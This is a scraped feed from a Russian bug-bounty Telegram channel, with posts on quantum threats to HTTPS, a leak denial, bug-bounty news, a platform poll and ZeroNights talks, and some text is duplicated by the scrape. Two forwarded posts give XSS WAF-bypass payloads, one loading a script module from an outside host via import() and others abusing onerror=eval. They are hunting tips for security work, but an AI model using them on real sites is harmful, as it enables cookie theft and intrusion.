This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
👎21👍10🥴8❤1
🧐 Квантовый компьютер
Я уже давал свои предсказания насчет AI-багхантеров и вирусов с мозгами, как оказалось они были правильные. Теперь хочу рассказать про квантовые компьютеры. Мне кажется, что некоторые страны уже располагают реальными квантовыми компьютерами, и уже даже потенциально могут их применять в каких-то секретных спецоперациях. Могут, например, что-то взломать с помощью квантового компьютера, а тех кого взломали - они даже об этом, вероятно, могут и не узнать. Понятно, что Bitcoin никто рушить не будет, вычислить приватный ключ по публичному и слить кучу биткоинов - хоть это и возможно, это может быть слишком палевно. Но, например, HTTPS трафик для квантового комьютера прозрачен - можно прочитать, учитывая что он может накапливаться уже прямо сейчас. Я много общался со специалистами по информационной безопасности со всего мира, но никогда разговор не заходил про постквантовую криптографию. О ней даже не думают? Я считаю о ней нужно задуматься уже сейчас, потому-что переход и подготовка займут годы.
Я уже давал свои предсказания насчет AI-багхантеров и вирусов с мозгами, как оказалось они были правильные. Теперь хочу рассказать про квантовые компьютеры. Мне кажется, что некоторые страны уже располагают реальными квантовыми компьютерами, и уже даже потенциально могут их применять в каких-то секретных спецоперациях. Могут, например, что-то взломать с помощью квантового компьютера, а тех кого взломали - они даже об этом, вероятно, могут и не узнать. Понятно, что Bitcoin никто рушить не будет, вычислить приватный ключ по публичному и слить кучу биткоинов - хоть это и возможно, это может быть слишком палевно. Но, например, HTTPS трафик для квантового комьютера прозрачен - можно прочитать, учитывая что он может накапливаться уже прямо сейчас. Я много общался со специалистами по информационной безопасности со всего мира, но никогда разговор не заходил про постквантовую криптографию. О ней даже не думают? Я считаю о ней нужно задуматься уже сейчас, потому-что переход и подготовка займут годы.
🔥8😨2❤1👏1
Forwarded from SHADOW:Group
Недавно попалось приложение, которое не давало мне проэксплуатировать XSS. WAF тригерился на использование большинства функций и ключевых слов, таких как
В таких случаях часто на помощь приходит функция
Для эксплуатации я использовал пэйлоад
Кроме того, с его помощью можно удобно выполнить любой код, указав его через символ
#web #waf #xss
alert, document.cookie и других.В таких случаях часто на помощь приходит функция
import(), которая позволяет подгружать JS-скрипты из внешнего модуля. Более подробно c этой функцией можете ознакомиться в документации.Для эксплуатации я использовал пэйлоад
Javanoscript:import('//X55.is')// который через import() выполняет загрузку вредоносного JS-модуля, размещенного на сайте X55.is. Данный модуль выполняет обычный alert.Кроме того, с его помощью можно удобно выполнить любой код, указав его через символ
#. Все, что будет после #, не будет видно на сервере, что поможет обойти WAF, а модуль в import считает содержимое из document.location.hash и выполнит код.javanoscript:import('//X55.is')//#alert('shdw')#web #waf #xss
❤11🔥6👍3
Forwarded from Минцифры России
Специалисты Минцифры проверили информацию о якобы случившейся утечке из мессенджера Max, размещённую в анонимных каналах.
Автором информации об утечке был выложен сэмпл, содержащий 15 записей, в которых были указаны якобы ID пользователей Госуслуг. Проверка показала, что ни по одной из опубликованных записей ID Госуслуг не совпадает с ФИО реальных пользователей.
Из чего можно сделать вывод, что публикации о взломе сфабрикованы.
@mintsifry #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
🥴10👍4🤮3🤝2
Forwarded from Репорты простым языком
🔥 НОВЫЕ ПРОГРАММЫ БАГБАУНТИ 🔥
Сегодня, 25 октября 2025 года, мы проверили крупнейшие российские платформы Bug Bounty:
- Standoff365
- BI.ZONE Bug Bounty
- BugBounty.ru
К сожалению, новых программ за последний день не обнаружено. 😔
💡 Совет для багхантеров:
Нет новых программ? Это отличный повод вернуться к уже существующим!
1. Повторное тестирование: Проверьте программы, которые давно не обновлялись. Возможно, там появились новые функции или были внесены изменения, которые могли создать новые векторы атаки.
2. Фокус на приватных программах: Активно участвуйте в публичных программах, чтобы повысить свой рейтинг и получить приглашения в более выгодные приватные программы.
3. Изучение отчетов: Читайте публичные отчеты (Disclosed Reports) на платформах, чтобы понять, какие типы уязвимостей наиболее актуальны и востребованы.
Всем удачной охоты! 🕵️♂️
Сегодня, 25 октября 2025 года, мы проверили крупнейшие российские платформы Bug Bounty:
- Standoff365
- BI.ZONE Bug Bounty
- BugBounty.ru
К сожалению, новых программ за последний день не обнаружено. 😔
💡 Совет для багхантеров:
Нет новых программ? Это отличный повод вернуться к уже существующим!
1. Повторное тестирование: Проверьте программы, которые давно не обновлялись. Возможно, там появились новые функции или были внесены изменения, которые могли создать новые векторы атаки.
2. Фокус на приватных программах: Активно участвуйте в публичных программах, чтобы повысить свой рейтинг и получить приглашения в более выгодные приватные программы.
3. Изучение отчетов: Читайте публичные отчеты (Disclosed Reports) на платформах, чтобы понять, какие типы уязвимостей наиболее актуальны и востребованы.
Всем удачной охоты! 🕵️♂️
🤣14🥴3🤝3💅2
🧐 Хочется навести какой-то суеты в сообществе, как-то стало скучно в последнее время. Согласны? Поэтому я решил устроить опрос, чтобы выяснить какая багбаунти-платформа в России сейчас ТОП-1 по мнению сообщества. Никаких правил в опросе нет (накрутки разрешены). Все в одинаковых условиях, поэтому я буду считать результат, который мы получим, правильным. В субботу вечером в 21:00 я остановлю голосование и подведем итоги. Интересно к чему это приведет. Я сделаю обзор в своём стиле для багбаунти платформы, которая победит.
🍓2🗿2🎄1
ТОП-1 БАГБАУНТИ ПЛАТФОРМА
Final Results
53%
Standoff 365 Bug Bounty
34%
BI.ZONE Bug Bounty
13%
Bug Bounty Ru
🥴13🫡4🌚2🤩1
Forwarded from ZeroNights
Надеемся, вы уже закончили рабочий день! 🤪 Потому что пришло время остановить мгновенье и узнать, какие еще доклады будут на Offensive Track конференции ZeroNights 2025
Мы будем добавлять доклады по мере их утверждения. Полный вариант программы вы всегда найдете по ссылке на нашем сайте конференции ZeroNights 2025👍
"Солевые приключения" — Павел Топорков
Как не уйти с пентеста несолоно хлебавши и найти ту самую рану в инфраструктуре, на которую можно насыпать соль. Рассказ о том, как устроен SaltStack, как его ломать, и в чём его соль, вы услышите на самом солёном докладе "Солевые приключения".
"Что в дашборде твоём? Я просто хотел посмотреть метрики..." — Сергей Гордейчик
Мониторинг — это не только про графики и тихие радости девопса, это и про стремительный pwn. Мы покажем, как через Grafana и, особенно, в связке с Prometheus и прочими k8s можно получить доступ к чувствительным данным, обойти ограничения сети и начать внутреннюю разведку — даже без yet another CVE. Доклад основан на живом исследовании с практическими примерами и тулами.
"Современные авто: от секретов в прошивке ЭБУ до удаленного "окирпичивания" целого автопарка" — Сергей Ануфриенко, Александр Козлов
Все мы в той или иной степени осведомлены о том, что подключенные устройства (IoT) нередко оказываются уязвимыми с точки зрения информационной безопасности. В то же время сегодня значительная часть современных автомобилей является подключенной — имеет связь с облачными сервисами производителя. В нашем докладе мы на конкретных примерах покажем, с какими уязвимостями в автомобильных блоках мы сталкивались в своей работе, какие сценарии атак возможны через доступные интерфейсы (включая СМС сообщения и облачную инфраструктуру) и какие последствия это может иметь для безопасности и эксплуатации транспортных средств.
Мы будем добавлять доклады по мере их утверждения. Полный вариант программы вы всегда найдете по ссылке на нашем сайте конференции ZeroNights 2025
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2💅2😁1😨1
В паблик вышла программа Контур, где можно заработать 1 миллион рублей за критические уязвимости. Огромное пространство для поиска дыр, а для тех кто любит финансовые приложения - у них даже банк есть - Контур.Банк. Ломал кто-то его? Но даже если и ломали, у меня для вас хорошая новость. В таких программах сайты регулярно обновляются, наверное почти каждый день - завозят новые уязвимости. Поэтому кто еще не выбрал себе прогу, рекомендую в целом для взлома - интересная программа.
3I/ATLAS
🔥9😁3❤2
Багхантер
ТОП-1 БАГБАУНТИ ПЛАТФОРМА
🔥🔥🔥 Standoff 365 Bug Bounty ТОП-1 БАГБАУНТИ ПЛАТФОРМА ПО МНЕНИЮ СООБЩЕСТВА. В опросе приняли участие 498 человек, 265 человек проголосовали за ТОП-1 платформу.
Скоро будет обзор
❤11🔥3👍2👏1
🔥 Расследование
Кажется на ZeroNights уже можно купить билеты. Я решил проверить, действительно ли это так и перешел по ссылке https://zeronights.ru/#tickets чтобы увидеть это своими глазами. И действительно - продажи билетов оказались открыты. Удалось выяснить что билет для студентов стоит 3500 рублей, а физические лица, желающие попасть на спикер-пати, должны заплатить 25000 рублей. Кроме этого, навигация по сайту показала, что в разделе "Программа" уже даже сейчас можно ознакомиться с программой мероприятия и выбрать доклад, чтобы потом его посмотреть.
Кажется на ZeroNights уже можно купить билеты. Я решил проверить, действительно ли это так и перешел по ссылке https://zeronights.ru/#tickets чтобы увидеть это своими глазами. И действительно - продажи билетов оказались открыты. Удалось выяснить что билет для студентов стоит 3500 рублей, а физические лица, желающие попасть на спикер-пати, должны заплатить 25000 рублей. Кроме этого, навигация по сайту показала, что в разделе "Программа" уже даже сейчас можно ознакомиться с программой мероприятия и выбрать доклад, чтобы потом его посмотреть.
zeronights.ru
ZeroNights 2025
11-я конференция по практическим аспектам информационной безопасности ZeroNights
🤡21😁8🤔1🤬1
🇷🇺 Мы с Пашкой поздравляем всех подписчиков с Днём народного единства
🔥21🤮11👍5🥴2
Forwarded from Standoff Bug Bounty Tips
Главная цель — обход WAF, который блокирует типичные паттерны XSS.
Как это работает
onerror на eval позволяет выполнить сообщение об ошибке как кодБазовый прием — использование функции перед шаблонной строкой:
alert`test`
Более продвинутый вариант — создание функции из строки:
Function`alert\u00281\u0029` ``
Здесь скобки заменены на unicode-представление (
\u0028 и \u0029).Динамическое выполнение кода через
hash:Function`_${location.hash.slice`1`}` ``Ключевая идея: подмена
onerror на eval и создание валидного JS-кода из сообщения об ошибке:onerror = eval
throw '=alert\x281\u0029'
Сообщение об ошибке в Chrome:
Uncaught =alert(1), что является валидным кодом (Uncaught становится переменной).Без точки с запятой (используя блок):
{onerror=alert}throw 1Или через запятую:
throw onerror=alert,1
В Firefox формат ошибок другой, поэтому используются объекты
Error:throw onerror=eval,x=new Error,x.message='alert\x281\x29',x
Пейлоад через regexp и конкатенацию:
throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337,3331,117]+a[13]
Здесь:
a[12] и a[13] извлекают ( и ) из строки функции URL/1/g — regexp, который в строке становится "/1/g"Uncaught /1/g(1337,3331,117) — валидный кодМанипуляция с
TypeError.prototype.name:TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']
Изменяется имя
TypeError, чтобы сообщение об ошибке начиналось с =/, формируя regexp, который комбинируется с -alert(1).Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15🤡3